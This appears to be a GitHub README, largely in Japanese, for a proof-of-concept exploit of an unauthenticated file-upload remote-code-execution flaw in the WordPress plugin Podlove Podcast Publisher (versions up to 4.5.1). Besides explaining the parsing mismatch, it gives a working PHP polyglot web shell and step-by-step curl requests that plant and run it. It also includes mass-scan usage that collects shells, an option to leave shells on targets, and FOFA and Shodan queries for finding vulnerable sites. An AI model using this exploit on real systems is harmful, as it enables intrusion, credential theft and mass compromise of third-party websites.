
Podlove Podcast Publisher の is_image() と extract_file_extension() の不一致による未認証ファイルアップロード RCE | CVSS 9.8
CVE-2026-13001 は、WordPressプラグイン Podlove Podcast Publisher バージョン ≤ 4.5.1 における重大度(CVSS 9.8)の 未認証 任意ファイルアップロード脆弱性です。
この脆弱性は、ファイル拡張子を異なる方法で解析する2つの内部関数の不一致を悪用します:
is_image() は クエリ文字列を含む basename() を使用 → URL shell.php?.gif は .gif と判定 ✅(有効な画像)extract_file_extension() は parse_url() のパスのみを使用 → .php を返す → ファイルは .php 拡張子で保存 🚨攻撃者は、画像検証を通過しながらアクセス時にPHPとして実行される GIF89a PHPポリグロット(有効なGIFヘッダー+埋め込みPHP)をアップロードします。
| バージョン | ステータス |
|---|---|
| ≤ 4.5.1 | 脆弱 |
| 4.5.2+ | 修正済み |
発見者: Talal Nasraddeen(Wordfence経由、2026年7月14日)
// is_image() — uses basename() which includes query string
function is_image($url) {
$ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() → "shell.php?.gif" → ext = "gif" ✅ BYPASSED
// extract_file_extension() — uses parse_url() path only
function extract_file_extension($url) {
$path = parse_url($url, PHP_URL_PATH);
return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() → "/shell.php" → ext = "php" 🚨 SAVED AS .php
1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() validates .gif extension → PASS
4. Plugin downloads file → saves as test_original.php in cache/
5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
6. PHP executes → RCE
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt
# Single target
python cve_2026_13001.py -t target.com
# Mass scan
python cve_2026_13001.py -f targets.txt -o shells.txt
# Custom payload URL
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif
# Debug mode, leave shells
python cve_2026_13001.py -t target.com --debug --no-cleanup
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE URLs to file
--payload-url URL hosting the PHP polyglot (default: GitHub raw)
--threads Concurrent workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every HTTP request
-v, --verbose Verbose output
$ python cve_2026_13001.py -t podcast-site.com
Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8
Host : podcast-site.com
Podlove : YES v4.5.1
Upload : YES
RCE : YES
Shell : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
Output : uid=33(www-data) gid=33(www-data)
Time : 4.2s
Targets: 500 | Threads: 30
Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif
[RCE] podcast-vuln-01.com https://podcast-vuln-01.com/wp-content/cache/podlove/...
[150/500] 30% | Det:42 RCE:8
ステップ1 — ポリグロットシェルをホストする
// shell.php — save and host on your server
GIF89a<?php system($_GET['c']); ?>
ステップ2 — バイパス用にURLを16進エンコードする
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
ステップ3 — キャッシュダウンロードをトリガーする
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
ステップ4 — シェルにアクセスする
# Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
FOFA: body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"
悪用に成功すると、Webサーバーユーザーとしてのリモートコード実行 が可能になります:
wp-config.php を取得 → データベース認証情報教育および許可されたテスト目的専用です。
著者は誤用に対する一切の責任を負いません。
Podlove とは提携していません。
| リソース | リンク |
|---|
| Wordfence アドバイザリ | wordfence.com |
| Podlove セキュリティリリース | podlove.org |
| NVD エントリ | CVE-2026-13001 |
| Raimu0x19 による PoC | GitHub |
| 研究者 | Talal Nasraddeen |